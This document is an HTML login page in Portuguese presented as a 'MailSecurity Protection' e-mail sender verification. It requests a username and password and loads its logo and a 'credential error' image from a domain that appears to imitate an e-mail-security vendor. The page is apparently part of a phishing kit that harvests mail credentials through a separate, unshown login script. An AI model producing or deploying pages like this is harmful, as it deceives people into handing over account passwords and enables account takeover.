<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" type="text/css" href="styles/login.css" />
    <title>Verificaçao de identidade do remetente do e-mail - autenticação e segurança de e-mails MailSecurity Protection</title>
</head>
<body>

    <div class="login-wrapper">
        <div class="wrapper">
            <div id="notify">
                <div class="notification">
                    <img src="https://domain-checker.dmarcian.com.br/img/erro_credenciais.png" id="notification_login">
                </div>
            </div>
            <div id="content-container">
                <div id="login-container">
                    <div id="login-sub-container">
                        <div id="login-sub-header">
                            <img src="https://domain-checker.dmarcian.com.br/background/logo_MailSecurity-white.png", id="logo_img">
                        </div>
                        <div id="forms">
                            <form novalidate="" id="login_form" target="_top" >
                                <div class="input-req-login"><label for="user">Usuario</label></div>
                                <div class="input-field-login icon username-container">
                                    <input name="user" id="user" autofocus="autofocus" value="" placeholder="Digite seu usuario." class="std_textbox" type="text" tabindex="1" required="">
                                </div>

                                <div class="input-req-login login-password-field-label"><label for="pass">Senha</label></div>
                                <div class="input-field-login icon password-container">
                                    <input name="pass" id="pass" placeholder="Digite a senha." class="std_textbox" type="password" tabindex="2" required="">
                                </div>

                                <div class="controls">
                                    <div class="login-btn">
                                        <button name="login" type="submit" id="login_submit" tabindex="3">Log in</button>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
   
    <div class="loading_conteiner" id="loading_conteiner">
        <div id="loading-overlay" class="loading-overlay">
            <div class="loader"></div>
        </div>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="js/login.js"></script>

</body>
</html>
